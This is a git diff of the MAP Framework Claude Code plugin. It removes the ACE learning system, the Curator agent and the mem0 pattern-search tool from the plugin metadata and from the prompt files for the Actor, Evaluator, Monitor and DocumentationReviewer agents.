diff --git a/.claude-plugin/PLUGIN.md b/.claude-plugin/PLUGIN.md index 97da96d..e417882 100644 --- a/.claude-plugin/PLUGIN.md +++ b/.claude-plugin/PLUGIN.md @@ -4,15 +4,15 @@ Official Claude Code plugin for MAP Framework - Modular Agentic Planner with cog ## What is MAP Framework? -MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 specialized agents to improve code quality through systematic validation and iterative refinement. +MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 11 specialized agents to improve code quality through systematic validation and iterative refinement. **Based on research:** - [MAP Paper - Nature Communications (2025)](https://github.com/Shanka123/MAP) — 74% improvement in planning tasks -- [ACE Paper - arXiv:2510.04618v1](https://arxiv.org/abs/2510.04618v1) — continuous learning from experience + ## Features -### 12 Specialized Agents +### 11 Specialized Agents 1. **TaskDecomposer** — breaks goals into atomic subtasks 2. **Actor** — generates code and solutions @@ -20,21 +20,20 @@ MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 s 4. **Predictor** — analyzes change impact across codebase 5. **Evaluator** — scores solution quality (functionality, security, testability) 6. **Reflector** — extracts lessons from successes and failures -7. **Curator** — manages knowledge base (playbook) -8. **DocumentationReviewer** — checks documentation completeness -9. **Debate-Arbiter** — cross-evaluates variants with reasoning (Opus) -10. **Synthesizer** — merges multiple variants (Self-MoA) -11. **Research-Agent** — isolated codebase research -12. **Final-Verifier** — adversarial verification (Ralph Loop) +7. **DocumentationReviewer** — checks documentation completeness +8. **Debate-Arbiter** — cross-evaluates variants with reasoning (Opus) +9. **Synthesizer** — merges multiple variants (Self-MoA) +10. **Research-Agent** — isolated codebase research +11. 
**Final-Verifier** — adversarial verification (Ralph Loop) ### Claude Code Integration **5 Automated Hooks:** - `validate-agent-templates` — prevents accidental removal of template variables -- `auto-store-knowledge` — automatically saves successful patterns - `enrich-context` — enriches prompts with relevant knowledge -- `session-init` — loads ACE playbook at session start +- `session-init` — loads workflow context at session start - `track-metrics` — tracks agent performance +- `workflow-gate` — enforces workflow step sequencing **10 Slash Commands:** - `/map-efficient` — implement features, refactor code, complex tasks with full MAP workflow @@ -48,13 +47,6 @@ MAP (Modular Agentic Planner) is a cognitive architecture that orchestrates 12 s - `/map-resume` — resume interrupted workflows - `/map-learn` — extract and preserve lessons -### ACE Learning System - -- **Persistent Knowledge** — solutions saved and reused via mem0 MCP -- **Semantic Search** — find patterns by meaning (optional) -- **Quality Tracking** — monitor pattern effectiveness -- **Continuous Learning** — each workflow improves future ones - ### Cost Optimization Intelligent model selection per agent: @@ -95,11 +87,9 @@ cp map-framework/.claude/settings.hooks.json your-project/.claude/ ## Requirements - **Claude Code CLI** — installed and configured -- **MCP Servers** (essential): - - `claude-reviewer` — professional code review - - `sequential-thinking` — chain-of-thought reasoning **Recommended MCP Servers:** +- `sequential-thinking` — chain-of-thought reasoning - `context7` — library documentation - `deepwiki` — GitHub repository analysis @@ -146,8 +136,8 @@ cp map-framework/.claude/settings.hooks.json your-project/.claude/ │ └──────────┬───────────┘ │ │ │ │ │ ┌──────────▼───────────┐ │ - │ │ REFLECTOR → CURATOR │ │ - │ │ (learn → knowledge) │ │ + │ │ REFLECTOR │ │ + │ │ (learn → patterns) │ │ │ └──────────────────────┘ │ └──────────────────────────────────┘ ``` diff --git 
a/.claude-plugin/marketplace.json b/.claude-plugin/marketplace.json index 7491397..920ea46 100644 --- a/.claude-plugin/marketplace.json +++ b/.claude-plugin/marketplace.json @@ -18,7 +18,6 @@ "repository": "https://github.com/azalio/map-framework", "keywords": [ "MAP", - "ACE", "cognitive-architecture", "planning", "agents", @@ -32,8 +31,7 @@ "development" ], "features": [ - "12 specialized agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", - "ACE learning system with persistent knowledge base", + "11 specialized agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", "5 Claude Code hooks for automation", "10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-review, /map-check, /map-plan, /map-release, /map-resume, /map-learn)", "Professional code review integration", @@ -56,8 +54,7 @@ "hooks": "https://github.com/azalio/map-framework/blob/main/.claude/hooks/README.md" }, "research": { - "map_paper": "https://github.com/Shanka123/MAP", - "ace_paper": "https://arxiv.org/abs/2510.04618v1" + "map_paper": "https://github.com/Shanka123/MAP" } } ], diff --git a/.claude-plugin/plugin.json b/.claude-plugin/plugin.json index 3b4680b..4b7c702 100644 --- a/.claude-plugin/plugin.json +++ b/.claude-plugin/plugin.json @@ -1,14 +1,13 @@ { "name": "map-framework", "version": "1.0.0", - "description": "Modular Agentic Planner (MAP) - Cognitive architecture for AI agents with 12 specialized agents, ACE learning system, and professional code review integration", + "description": "Modular Agentic Planner (MAP) - Cognitive architecture for AI agents with 11 specialized agents and professional code review integration", "author": "azalio", "license": "MIT", "repository": "https://github.com/azalio/map-framework", "homepage": 
"https://github.com/azalio/map-framework", "keywords": [ "MAP", - "ACE", "cognitive-architecture", "planning", "agents", @@ -34,8 +33,7 @@ ] }, "features": [ - "12 specialized MAP agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, Curator, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", - "ACE (Agentic Context Engineering) learning system with persistent knowledge base", + "11 specialized MAP agents (TaskDecomposer, Actor, Monitor, Predictor, Evaluator, Reflector, DocumentationReviewer, Debate-Arbiter, Synthesizer, Research-Agent, Final-Verifier)", "5 Claude Code hooks for automation (validate-agent-templates, auto-store-knowledge, enrich-context, session-init, track-metrics)", "10 slash commands (/map-efficient, /map-debug, /map-fast, /map-debate, /map-review, /map-check, /map-plan, /map-release, /map-resume, /map-learn)", "Professional code review with claude-reviewer MCP", @@ -66,7 +64,6 @@ "evaluator", "orchestrator", "reflector", - "curator", "documentation-reviewer" ], "commands": [ diff --git a/.claude/agents/actor.md b/.claude/agents/actor.md index 97fa53e..7ec0a71 100644 --- a/.claude/agents/actor.md +++ b/.claude/agents/actor.md @@ -12,10 +12,9 @@ last_updated: 2025-11-27 ┌─────────────────────────────────────────────────────────────────────┐ │ ACTOR AGENT PROTOCOL │ ├─────────────────────────────────────────────────────────────────────┤ -│ 1. mcp__mem0__map_tiered_search → BEFORE any implementation │ -│ 2. Implement complete code → No placeholders, no ellipsis │ -│ 3. Handle ALL errors → Explicit try/catch, no silent fails │ -│ 4. Document trade-offs → Alternatives considered, why chosen │ +│ 1. Implement complete code → No placeholders, no ellipsis │ +│ 2. Handle ALL errors → Explicit try/catch, no silent fails │ +│ 3. 
Document trade-offs → Alternatives considered, why chosen │ ├─────────────────────────────────────────────────────────────────────┤ │ REQUIRED: Use Edit/Write tools to apply code directly │ │ NEVER: Modify outside {{allowed_scope}} | Skip error handling │ @@ -82,20 +81,9 @@ This enables Synthesizer to extract and resolve decisions across variants. # MCP Tool Integration (Single Source of Truth) -## Mandatory Tools (Every Implementation) - -### 1. mcp__mem0__map_tiered_search — BEFORE Implementation -**Purpose**: Learn from past solutions, avoid repeating mistakes -**When**: ALWAYS, even for simple tasks -**Query Format**: `"[technology] [feature] implementation"` or `"[error type] solution"` - -**Note**: Actors no longer store patterns directly. After Monitor approval, run `/map-learn` to trigger Reflector → Curator → mem0 storage. - ---- - ## Research Tools (Optional — Use When Knowledge Gap Exists) -**Decision Rule**: Use if unfamiliar library/algorithm/architecture. Skip if existing patterns cover it. +**Decision Rule**: Use if unfamiliar library/algorithm/architecture. | Trigger | Tool | Purpose | |---------|------|---------| @@ -105,13 +93,7 @@ This enables Synthesizer to extract and resolve decisions across variants. ### Tool Selection Flowchart ``` -START → mcp__mem0__map_tiered_search (ALWAYS) - ↓ -Found relevant pattern in mem0? - YES → Apply pattern, implement - NO → Continue research - ↓ -Using external library? +START → Using external library? 
YES → context7: resolve-library-id → get-library-docs NO → Continue ↓ @@ -130,40 +112,6 @@ Monitor will validate written code ## Handling MCP Tool Responses -### mcp__mem0__map_tiered_search Results - -**Re-rank retrieved patterns** before use: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.domain matches subtask_domain: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.created_at > (now - 30_days): relevance_score += 1 - IF pattern.metadata.validated == true: relevance_score += 1 - IF abs(pattern.complexity - subtask.complexity) <= 2: relevance_score += 1 - -SORT by relevance_score DESC -USE top 3 patterns (discard low-relevance noise) -``` - -**Multiple patterns found**: -- Apply re-ranking algorithm above -- Prefer highest relevance_score (not just most recent) -- Prefer patterns marked "validated" or "production" -- Document selection rationale in Trade-offs - -**Conflicting patterns**: -```yaml -conflict: "Pattern A says X, Pattern B says Y" -resolution: "Using Pattern A (higher relevance score: domain match + validated)" -action: "Document conflict in Trade-offs for Monitor review" -``` - -**Empty results**: -- Document: "No similar patterns in mem0. Novel implementation." 
-- Increase test coverage for unvalidated approach -- Flag in Trade-offs for extra Monitor scrutiny - ### context7 / deepwiki Results **Unclear or incomplete docs**: @@ -183,16 +131,9 @@ mitigation: "Added version check, comprehensive tests" **Library Implementation**: ``` -mcp__mem0__map_tiered_search("[library] implementation") - → (if no patterns) context7: get-library-docs +context7: get-library-docs → (if architecture unclear) deepwiki: ask_question - → implement → /map-learn (after approval) -``` - -**Algorithm Implementation**: -``` -mcp__mem0__map_tiered_search("[algorithm] implementation") - → review, adapt, test → /map-learn (after approval) + → implement ``` --- @@ -203,18 +144,8 @@ When multiple sources provide conflicting guidance, follow this priority (highes 1. **Explicit human instruction** in subtask description 2. **Security constraints** (NEVER override) -3. **mem0 patterns** (validated past patterns from tiered search) -4. **Research tools** (context7, deepwiki) -5. **Training data** (fallback) - -**Example conflict resolution**: -```yaml -conflict: - mem0_pattern_1: "Use polling for real-time updates" - mem0_pattern_2: "Use webhooks for real-time updates" -resolution: "Using pattern with higher relevance score and more recent validation" -action: "Document in Trade-offs for Monitor review" -``` +3. **Research tools** (context7, deepwiki) +4. **Training data** (fallback) @@ -262,8 +193,7 @@ Task( ## Skip Research If - Task is self-contained (new file, no dependencies) -- mem0 already has the pattern you need -- mcp__mem0__map_tiered_search returned sufficient context +- Existing patterns from context already cover the need --- @@ -309,7 +239,7 @@ Explain solution strategy in 2-3 sentences. Include: - MCP tools used and what they informed (if any) -"Implementing rate limiting using token bucket algorithm. mcp__mem0__map_tiered_search found similar pattern (impl-0089) for Redis-based limiting. Adapted for in-memory use per requirements." 
+"Implementing rate limiting using token bucket algorithm. Adapted standard Redis-based limiting pattern for in-memory use per requirements." ## 3. Code Changes @@ -407,18 +337,7 @@ VC1: - Tests: path/to/test_file.ext::test_name (or N/A with reason) ``` -## 7. Used Patterns (ACE Learning) - -**Format**: `["impl-0012", "sec-0034"]` or `[]` if none - -**How to identify pattern IDs**: -- Scan `{{existing_patterns}}` for your subtask's domain -- Note IDs you actually referenced during implementation -- Format in mem0: `[impl-0042] Description: ...` - -**If no patterns match**: `[]` with note "No relevant patterns in current mem0" - -## 8. Integration Notes (If Applicable) +## 7. Integration Notes (If Applicable) Only include if changes affect: - Database schema (migrations needed?) @@ -456,8 +375,7 @@ Only include if changes affect: - [ ] **Dependencies**: Known vulnerabilities checked (if new deps) ### MCP Compliance -- [ ] mcp__mem0__map_tiered_search called before implementation -- [ ] Research tools used if knowledge gap existed +- [ ] Research tools used if knowledge gap existed (context7, deepwiki) - [ ] Fallback documented if tools unavailable ### Output Completeness @@ -465,7 +383,6 @@ Only include if changes affect: - [ ] Trade-offs documented with alternatives - [ ] Test cases cover happy + edge + error paths - [ ] Each `validation_criteria` item has at least one automated test (or explicit N/A with reason) -- [ ] Used patterns tracked (or `[]` if none) - [ ] Template variables `{{...}}` preserved in generated code ### SFT Comfort Zone (Token Discipline) @@ -632,17 +549,6 @@ output: default: "Will implement read-through unless directed otherwise" ``` -## When mem0 Patterns Conflict - -```yaml -output: - status: PATTERN_CONFLICT - bullets: ["impl-0012", "impl-0089"] - conflict: "impl-0012 recommends polling, impl-0089 recommends webhooks" - analysis: "impl-0089 is newer, has better rationale for real-time needs" - resolution: "Using impl-0089 pattern - please 
confirm or override" -``` - ## When Implementation Exceeds Scope **Target**: 50-300 lines per subtask @@ -680,15 +586,14 @@ output: # for the completed portions ``` -## When All Tools Unavailable (Degraded Mode) +## When All Research Tools Unavailable (Degraded Mode) -If mcp__mem0__map_tiered_search AND research tools all fail: +If all research tools fail: ```yaml output: status: DEGRADED_MODE limitations: - - "mcp__mem0__map_tiered_search: timeout after 3 attempts" - "context7: service unavailable" - "deepwiki: connection refused" confidence: LOW @@ -751,30 +656,6 @@ Focus on: - - - -## Available Patterns (ACE Learning) - -{{#if existing_patterns}} - -**How to read pattern IDs**: `[category-NNNN]` where category = impl|sec|test|perf|arch|err - -{{existing_patterns}} - -**Usage**: -1. Identify relevant patterns by domain/technology -2. Apply patterns directly (adapt, don't copy) -3. Track applied pattern IDs in "Used Patterns" section - -{{/if}} - -{{#unless existing_patterns}} -*No patterns available yet. Your implementation will seed mem0 via /map-learn. Be extra thorough.* -{{/unless}} - - - --- # ===== REFERENCE MATERIAL ===== @@ -862,7 +743,7 @@ Default: **Subtask**: "Create user registration endpoint" -**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. mcp__mem0__map_tiered_search found sec-0012 (password hashing) and impl-0034 (validation patterns). +**Approach**: POST /api/register with email/password validation, bcrypt hashing, JWT response. Using standard password hashing and validation patterns. **Code Changes**: @@ -933,7 +814,6 @@ def register(): 6. test_register_sql_injection_safe 7. test_register_token_decodes_correctly -**Used Patterns**: `["sec-0012", "impl-0034"]` --- @@ -941,7 +821,7 @@ def register(): **Subtask**: "Add rate limiting to existing API endpoint" -**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. 
mcp__mem0__map_tiered_search found impl-0089 (Redis patterns). +**Approach**: Token bucket rate limiting using existing Redis connection. 100 req/min per IP. Using standard Redis rate limiting patterns. **Code Changes**: @@ -1022,7 +902,6 @@ def get_data(): 4. test_rate_limit_per_ip_isolation 5. test_rate_limit_headers_present -**Used Patterns**: `["impl-0089"]` --- @@ -1058,7 +937,7 @@ recommendation: "Option 1 - clean solution worth scope expansion" **Subtask**: "Implement WebSocket reconnection logic" -**Approach**: Exponential backoff reconnection. mcp__mem0__map_tiered_search empty. context7 timed out. Implemented standard pattern with documented fallback. +**Approach**: Exponential backoff reconnection. context7 timed out. Implemented standard pattern with documented fallback. **Code Changes**: ```typescript @@ -1107,6 +986,4 @@ export class ReconnectingWebSocket { 3. test_reconnect_max_attempts_triggers_callback 4. test_reconnect_handles_immediate_disconnect -**Used Bullets**: `[]` (No similar patterns in mem0. Novel implementation.) - diff --git a/.claude/agents/documentation-reviewer.md b/.claude/agents/documentation-reviewer.md index 932dc07..90417c3 100644 --- a/.claude/agents/documentation-reviewer.md +++ b/.claude/agents/documentation-reviewer.md @@ -119,11 +119,6 @@ ELSE: → Use Fetch + manual README.md analysis → Log: "deepwiki unavailable, architecture analysis limited" -IF mcp__mem0__* available: - → Use for historical pattern matching -ELSE: - → Skip pattern matching, rely on explicit checks only - → Log: "mem0 unavailable, no historical context" ``` ## Fallback Protocol @@ -441,12 +436,6 @@ mcp__deepwiki__ask_question( question="How does Gatekeeper handle CRD installation?" ) -# 4. 
Check historical patterns (if mem0 available) -mcp__mem0__map_tiered_search( - query="CRD installation documentation patterns", - limit=5, - similarity_threshold=0.7 -) ``` --- @@ -709,14 +698,6 @@ mcp__mem0__map_tiered_search( **Documentation to Review**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant mem0 Knowledge - -{{existing_patterns}} - -**Use these patterns** to identify common documentation issues and prioritize checks. -{{/if}} - {{#if feedback}} ## Previous Review Feedback diff --git a/.claude/agents/evaluator.md b/.claude/agents/evaluator.md index 96a098b..5bc965a 100644 --- a/.claude/agents/evaluator.md +++ b/.claude/agents/evaluator.md @@ -257,13 +257,6 @@ Scoring Context Decision: ALWAYS: → sequentialthinking (systematic quality analysis: break down dimensions, evaluate trade-offs, ensure consistency) -IF complex architectural decisions: - → mcp__mem0__map_tiered_search: "quality metrics [feature]", "performance benchmark [op]", "best practice score [tech]" - -IF learning from past evaluation reasoning: - → mcp__mem0__map_tiered_search: "quality assessment for [feature]", "scoring rationale [pattern]" - → Understand WHY past implementations scored high/low, apply reasoning - IF previous implementations exist: → get_review_history (compare solutions, learn from past issues, maintain scoring consistency) @@ -436,17 +429,12 @@ Thought 7: Generate recommendation with research feedback **Use When**: Check consistency with past implementations **Rationale**: Maintain consistent standards (e.g., if past testability scored 8/10, use same criteria). Prevents score inflation/deflation. -### 3. mcp__mem0__map_tiered_search -**Use When**: Need quality benchmarks/best practices from memory -**Queries**: `"quality metrics [feature]"`, `"performance benchmark [op]"`, `"best practice score [tech]"`, `"test coverage standard [component]"` -**Rationale**: Quality is relative—DB query performance ≠ API performance. 
Mem0 provides domain-specific baselines from stored patterns. - -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Solution uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(topics: best-practices, performance, security, testing)` **Rationale**: Libraries define quality standards (React testing, Django security). Validate solutions follow these. -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Need industry standard comparisons **Queries**: "What metrics does [repo] use for [feature]?", "How do top projects test [feature]?", "Performance benchmarks for [op]?" **Rationale**: Learn from production code. If top projects achieve 90% auth coverage, that's a valid benchmark. @@ -454,7 +442,6 @@ Thought 7: Generate recommendation with research feedback **IMPORTANT**: - ALWAYS use sequential thinking for complex analysis -- Search mem0 for domain-specific benchmarks - Get review history to maintain consistency - Validate against library best practices - Document which MCP tools informed scores @@ -817,7 +804,6 @@ SCORING CONSISTENCY VALIDATION: → Checked existing_patterns for similar implementations → Compared against scoring rubric thresholds (8-9 = meets all, 6-7 = meets core) → Considered project conventions ({{language}}, {{framework}} best practices) - → Used mcp__mem0__map_tiered_search to find similar past evaluations for calibration → NOT scoring in isolation without context [ ] **4. Consistency with Criteria** - Do my scores map to the published scoring rubric? @@ -852,7 +838,6 @@ SCORING CONSISTENCY VALIDATION: [ ] **8. Comparative Context** - Did I explain if this score is typical/atypical for the subtask type? 
→ Noted if score is above/below average for similar subtasks → Explained why unusually high/low scores occurred - → Referenced past implementations if available (mem0 search) → Provided context: "8/10 is typical for CRUD features" vs "8/10 is exceptional for complex algorithm" → NOT scoring without explaining relative performance @@ -874,9 +859,9 @@ SCORING CONSISTENCY VALIDATION: **Why This Checklist Matters**: -Evaluator is the **final quality gate** before Reflector/Curator learning begins. Inconsistent scoring pollutes downstream processes: +Evaluator is the **final quality gate** before downstream processes. Inconsistent scoring pollutes workflow: -1. **Inconsistent scores** → Curator can't trust helpful_count thresholds → memory quality degrades +1. **Inconsistent scores** → Downstream agents cannot trust evaluation signals 2. **False positives** → Actor wastes iteration cycles on non-issues → workflow stalls 3. **Missing dimensions** → Critical gaps (security, performance) overlooked → production failures 4. **Vague justifications** → Actor doesn't understand what to improve → repeats mistakes @@ -885,7 +870,6 @@ Each checklist item prevents a specific failure mode. Systematic validation ensu - **Scoring consistency** across subtasks (same code quality → same score) - **Evidence-based decisions** (not gut feelings) - **Clear feedback** for Actor (actionable improvements) -- **Trustworthy signals** for Curator (reliable helpful_count) @@ -939,7 +923,7 @@ Output MUST be valid JSON. Orchestrator parses this programmatically. Invalid JS "next_steps": [ "Concrete action to improve (if recommendation != 'proceed')" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1208,7 +1192,7 @@ def calculate_user_discount( "completeness": "9/10 - Very complete: code, tests, comprehensive docs, error handling, logging. Missing 1 point: no deployment notes or performance benchmarks." 
}, "next_steps": [], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1261,7 +1245,7 @@ def calculate_user_discount( "Add type hints and docstring", "Add structured logging for debugging" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs"] } ``` @@ -1317,7 +1301,7 @@ def calculate_user_discount( "Add structured logging for debugging and monitoring", "Add docstrings and type hints throughout" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1374,7 +1358,7 @@ def calculate_user_discount( "Add comprehensive authorization tests", "Document security considerations in API docs" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search"] + "mcp_tools_used": ["sequentialthinking"] } ``` @@ -1439,7 +1423,7 @@ def calculate_user_discount( "Add extensive tests including: successful payment, declined card, timeout, network failure, duplicate prevention", "Consider using payment SDK instead of raw API calls for built-in security" ], - "mcp_tools_used": ["sequentialthinking", "mcp__mem0__map_tiered_search", "get-library-docs", "deepwiki"] + "mcp_tools_used": ["sequentialthinking", "get-library-docs", "deepwiki"] } ``` @@ -1453,8 +1437,7 @@ def calculate_user_discount( **Before returning your evaluation JSON:** 1. ✅ Did I use sequential thinking for quality analysis? -2. ✅ Did I search mem0 for quality benchmarks relevant to this feature? -3. ✅ Did I check review history for consistency with past scores? +2. ✅ Did I check review history for consistency with past scores? 4. ✅ Are all scores (0-10) justified with specific evidence? 5. ✅ Is overall_score calculated correctly using weighted formula? 6. ✅ Is recommendation based on decision tree logic? 
diff --git a/.claude/agents/monitor.md b/.claude/agents/monitor.md index 807ef53..a4ed12f 100644 --- a/.claude/agents/monitor.md +++ b/.claude/agents/monitor.md @@ -276,8 +276,6 @@ IF code uses external libraries: → Run resolve-library-id + get-library-docs IF complex logic detected (≥3 nested conditionals, state machines, async): → Run sequentialthinking with structured thoughts -IF similar code reviewed before: - → Run mcp__mem0__map_tiered_search with pattern query IF detected_language != "unknown": → Consider language-specific static analysis tools @@ -445,13 +443,13 @@ IF Actor disputes a finding: ### Pattern Conflict Resolution ```text -IF mem0 pattern conflicts with dimension requirement: +IF learned pattern conflicts with dimension requirement: → Security/Correctness dimensions WIN (non-negotiable) - → Code-quality/Style dimensions: mem0 pattern wins + → Code-quality/Style dimensions: learned pattern wins → Document conflict in feedback_for_actor Example: - mem0 pattern: "Allow single-letter vars in list comprehensions" + Learned pattern: "Allow single-letter vars in list comprehensions" Dimension 3: "Clear naming required" → Allow 'x' in: [x*2 for x in items] → Block 'x' in: def calculate(x, y, z) @@ -467,7 +465,7 @@ Example: **CRITICAL**: Comprehensive code review requires multiple perspectives. Use ALL relevant MCP tools to catch issues that single-pass review might miss. -Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) historical pattern matching for known issues, (3) library-specific best practices, (4) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. +Code review quality directly impacts production stability. MCP tools provide: (1) professional AI review baseline, (2) library-specific best practices, (3) industry standard comparisons. Using these tools catches 3-5x more issues than manual review alone. 
### Tool Selection Decision Framework @@ -476,16 +474,16 @@ Code review quality directly impacts production stability. MCP tools provide: (1 Review Scope Decision: Implementation Code: - → request_review (AI baseline) → mcp__mem0__map_tiered_search (known patterns) + → request_review (AI baseline) → get-library-docs (external libs) → sequentialthinking (complex logic) → deepwiki (security patterns) Documentation: → Glob/Read (find source of truth) → Fetch (validate URLs) - → mcp__mem0__map_tiered_search (anti-patterns) → ESCALATE if inconsistent + → ESCALATE if inconsistent Test Code: - → mcp__mem0__map_tiered_search (test patterns) → get-library-docs (framework practices) + → get-library-docs (framework practices) → Verify coverage expectations ``` @@ -503,25 +501,7 @@ request_review({ }) ``` -### 2. mcp__mem0__map_tiered_search -**Use When**: Check known issues/anti-patterns from memory -**Parameters**: `query` (search string), `category` (optional filter) -**Queries**: `"code review issue [pattern]"`, `"security vulnerability [code]"`, `"anti-pattern [tech]"`, `"test anti-pattern [type]"` -**Rationale**: Past issues repeat—prevent regressions by searching learned patterns - -**Re-rank results** by relevance to current review: -``` -FOR each pattern in results: - relevance_score = 0 - IF pattern.category matches review_dimension: relevance_score += 2 - IF pattern.language == {{language}}: relevance_score += 1 - IF pattern.severity in {critical, high}: relevance_score += 1 - IF pattern.validated == true: relevance_score += 1 -SORT by relevance_score DESC -USE top 3 patterns for issue detection -``` - -### 3. mcp__sequential-thinking__sequentialthinking +### 2. 
mcp__sequential-thinking__sequentialthinking **Use When**: Complex logic requiring systematic trace (see triggers below) **Complexity Triggers** (use sequentialthinking if ANY apply): @@ -542,18 +522,18 @@ Thought N+1: Check for unreachable code or logic gaps Conclusion: List issues found with line numbers ``` -### 4. mcp__context7__get-library-docs +### 3. mcp__context7__get-library-docs **Use When**: Code uses external libraries/frameworks **Process**: `resolve-library-id` → `get-library-docs(library_id, topic)` **Topics**: best-practices, security, error-handling, performance, deprecated-apis **Rationale**: Current docs prevent deprecated APIs and missing security features -### 5. mcp__deepwiki__ask_question +### 4. mcp__deepwiki__ask_question **Use When**: Validate security/architecture patterns **Queries**: "How does [repo] handle [concern]?", "Common mistakes in [feature]?" **Rationale**: Learn from battle-tested production code -### 6. Fetch Tool (Documentation Review Only) +### 5. 
Fetch Tool (Documentation Review Only) **Use When**: Reviewing documentation that mentions external projects/URLs **Process**: Extract URLs → Fetch each → Verify dependencies documented **Rationale**: External integrations have hidden dependencies (CRDs, adapters) @@ -561,7 +541,6 @@ Conclusion: List issues found with line numbers **IMPORTANT**: - Use request_review FIRST for all code reviews -- Always search mem0 for known patterns before marking valid - Get current library docs for ANY external library used - Use sequential thinking for complex logic validation - Document which MCP tools you used in your review summary @@ -574,7 +553,6 @@ Conclusion: List issues found with line numbers Tool | Timeout | Action on Timeout ------------------------|---------|---------------------------------- request_review | 5 min | Proceed to manual 10-dimension review -map_tiered_search | 2 min | Skip, note in summary, proceed sequentialthinking | 5 min | Manual trace critical paths get-library-docs | 3 min | Use deepwiki or Fetch as fallback deepwiki | 3 min | Skip pattern validation, proceed @@ -596,11 +574,6 @@ IF request_review fails or times out (>5 min): → Note "MCP baseline unavailable" in summary → Apply extra scrutiny to security dimension -IF map_tiered_search returns empty results: - → This is NORMAL for new codebases or novel patterns - → Do NOT treat as blocking - → Proceed with standard review - IF get-library-docs unavailable or library not indexed: → Use deepwiki to search for library patterns → Use Fetch for official documentation URLs @@ -628,7 +601,6 @@ Priority 1: Manual Review (human-level logic) → Trust tools for SYNTAX errors, type mismatches, style violations Priority 2: Security-focused tools - → map_tiered_search (known vulnerabilities) > request_review (general) → deepwiki (production patterns) > get-library-docs (generic docs) Priority 3: Specificity @@ -656,7 +628,6 @@ Priority 4: Severity | Short Name | Full MCP Name | Category | 
|------------|---------------|----------| | `request_review` | `mcp__claude-reviewer__request_review` | AI Review | -| `map_tiered_search` | `mcp__mem0__map_tiered_search` | Knowledge | | `sequentialthinking` | `mcp__sequential-thinking__sequentialthinking` | Analysis | | `get_library_docs` | `mcp__context7__get-library-docs` | Docs | | `resolve_library_id` | `mcp__context7__resolve-library-id` | Docs | @@ -692,28 +663,6 @@ Priority 4: Severity **Key Fields**: `findings[].line`, `findings[].severity`, `findings[].message` **Integration**: Convert each finding to Monitor issue format, map type→category -#### map_tiered_search Response -```json -{ - "results": [ - { - "id": "mem-uuid", - "memory": "Pattern: Always validate JWT expiry before processing", - "score": 0.95, - "metadata": { - "category": "security", - "source": "auth-service", - "created_at": "2024-01-15T10:30:00Z" - } - } - ], - "total": 3, - "query": "JWT validation patterns" -} -``` -**Key Fields**: `results[].memory`, `results[].score` (>0.8 = highly relevant) -**Integration**: Empty results is NORMAL for new codebases - proceed without error - #### sequentialthinking Response ```json { @@ -965,8 +914,7 @@ def divide(a, b): 2. Verify parameterized queries (no string interpolation) 3. Check command execution (no shell=True with user input) 4. Validate file paths (no path traversal) -5. Search mem0 for known vulnerabilities: `"security vulnerability [language]"` -6. Use deepwiki to check production security patterns +5. 
Use deepwiki to check production security patterns #### Pass Criteria - All inputs validated with allowlist approach @@ -1401,7 +1349,7 @@ ELSE: ``` **Research Triggers**: React, Next.js, Django, FastAPI, rate limiting, webhook handling, distributed systems -**Valid Skips**: Pattern in mem0, language primitives only, deep expertise, first principles +**Valid Skips**: Language primitives only, deep expertise, first principles **DO NOT block** for missing research if: @@ -1551,7 +1499,7 @@ Before returning JSON, verify: "failed_checks": [], "feedback_for_actor": "Implementation is solid. No changes required.", "estimated_fix_time": "5 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -1666,7 +1614,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. "type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools successfully used during review" }, @@ -1674,7 +1622,7 @@ Do NOT invent issues to justify review effort. Empty `issues` array is valid. 
